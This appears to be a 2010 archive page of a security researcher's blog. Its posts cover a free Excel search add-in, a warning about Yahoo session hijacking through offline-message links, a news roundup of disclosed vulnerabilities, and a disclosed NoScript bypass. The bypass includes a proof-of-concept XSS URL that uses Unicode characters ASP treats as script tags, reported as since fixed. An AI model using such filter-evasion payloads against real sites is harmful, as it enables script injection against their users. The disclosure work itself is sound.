Monthly Archives: August 2010

Excel Advanced Search Add-In Application

This is a handy Excel Add-In which helps you to search/replace inside of your excel files better and simpler. The best thing about this Add-In is that it’s free and open source. Therefore, you can simply customize it for your needs.
Unfortunately the built-in search function of Microsoft Excel is too weak, and it cannot even do the simple tasks. Moreover, other useful search applications that can search/replace inside of Excel files are not free. As a result, I decided to write this tool in order to have more power in Excel searching process.
As this application is quite new, it is not free of fault. Please let me know if you find any issue. I will try to update this section in future in case of having a new release for this application.

Features

– Accepting Regular Expressions
– Supporting Inclusion or Exclusion
– Case sensitivity option
– Selecting unique results option
– Ability to export the results to an Excel file
– Searching in multiple files at the same time
– Detecting opened Workbooks
– Flexible result view
– Having search and replace functionality
– Having Formula Schema option (currently it just have credit card number checker)
– Having logbook to keep the previous keywords
– Capable to search inside of different versions of Excel files

Download

Version: 2.6.1
Date: 14 August 2010
Author: Soroush Dalili
Price: Free and open source!
Download Link: http://soroush.secproject.com/downloadable/excel_search_app.zip
Download Link (Mirror): http://www.0me.me/files/soroush.secproject.com/excel_search_app.zip
URL: http://soroush.secproject.com/blog/projects/exceladvancedsearchapplication/

Screen Shots:

Clicking on an offline message link in Yahoo Messenger can lead to Session Hijacking

Clicking on an offline message link in Yahoo Messenger is the same as clicking on an unknown link in your yahoo mail! In fact, Yahoo authenticates you before opening the destination link by using this URL:
http://login.yahoo.com/config/reset_cookies_token?.token=[Your Valid Token]&.done=[Destination Link]
Note 1: Fortunately, the destination cannot read your valid token by using referrer section of the HTTP request. However, this valid token is stored at your browser’s history, and if you do not sign-out from Yahoo, it can be dangerous.
Now you may ask why clicking on link while you are authenticating in yahoo is dangerous:
There are a lot of Cross Site Scripting (XSS) vulnerabilities in yahoo.com sub-domains. Some of these XSS attacks are simply detectable by IE8 and/or NoScript (a recommended Mozilla Firefox Add-on), and some aren’t. For example, some of Asian sub-domains of yahoo.com still have SQL Injection. And it is simply possible to cover an XSS attack by using a simple SQL Injection. Moreover, there are some points with different encoded inputs such as UTF-7 or Base64 which can be used to bypass the client-side protections. There are some other types as well that I do not want to talk about them here (I do not want to teach how to find XSS in this post). Some examples: http://www.xssed.com/search?key=yahoo.com

I’m scared. What should I do then?
1- Only open your email in private browsing mode.
2- Do not click on unknown links which are sent to you via offline messages or your email. If you want to open that link, simply open another private browsing and copy/paste that link there to open it. Moreover, you can open those links in a different browser from your open yahoo mail or your default browser.
3- Please always look at the link destination and do not trust its name. For example this link will redirect you to google.com instead of: http://www.yahoo.com/.

I clicked on a link by mistake. What should I do?
1- If you have knowledge of web security, you can open that link while monitoring your browser by using a local proxy such as Fiddler or BurpSuite. You will see if there is any request to yahoo.com or any other domains then.
2- If you are not sure about what you have done, you MUST change your password immediately. This is the only way that you can protect yourself. Even decreasing the life time of your Yahoo session (Cookie) cannot solve your problem.

What will happen if I don’t care?
1- Attackers will have access to your Yahoo.com account without knowing your password. Fortunately, they cannot change your password directly (they still can use forgot password section).

NoScript New Bypass Method by Unicode in ASP

Update:

NoScript v2.0.2.3 does not have this problem anymore. I’m happier now. tnx to its clever author.

As I told Giorgio, all the problems will be reported to him first ;) 

Woohoo! You/We/They/or whatever! can still use unicode in some places!

NoScript cannot find out special unicode characters which mean something in ASP:

PoC:

http://Example.com/VulnFile.asp?DangInput=%u2329scr%u0131pt%u232A%u212Fval(‘alert’%2b'(“NoScript Bypass in ASP!\\nBy Soroush Dalili”)’)%u2329/scr%u0131pt%u232A

In this example I selected the characters from: http://rishida.net/scripts/uniview/uniview.php . For instance:
%u2329 = <
%u0131 = i
%u232A = >
%u212F = e
From Microsoft point of view! Therefore, IE8 XSS prevention can detect this encoding and NoScript cannot detect it.

New update – July 2010

I want to update my blog with this new post:
– I learned good things from BlackHat 2010 although I was not there! JavaSnoop is a great tool by the way. Although there are some minor bugs, this tool is solving many of my problems!

– Some software are immune against my reports like Fortify! I’m not sure if it’s a good thing for them however! This is not my policy!

– Burpsuite Pro is great and I’m waiting for the new version after fixing my issues (current version is 1.3.07).

– A dangerous CSRF vulnerability in Secunia Community has been fixed – in which attacker could change a user’s email address and then use forgot password feature to reset his/her password – immediately after my report.

More info: http://secunia.com/community/forum/thread/show/4856/notification_of_fixed_csrf_issue

– CodeProject.com wants to fix a vulnerability that I’ve reported 1 month ago.

– I’ve reported a Microsoft .Net security vulnerability to them and I’ve just received their first “thank you” email. Now, I’m waiting to see what would happen.

– I reported a dangerous CSRF vulnerability in BlogFa.com to them several months ago. Although they’ve fixed that issue, they did not give me any credit! Should I report their flaws in future? I’m not so sure!

– I want to release a powerful tool for Steganography in text soon! This is my MSc. project that I’ve changed it a bit.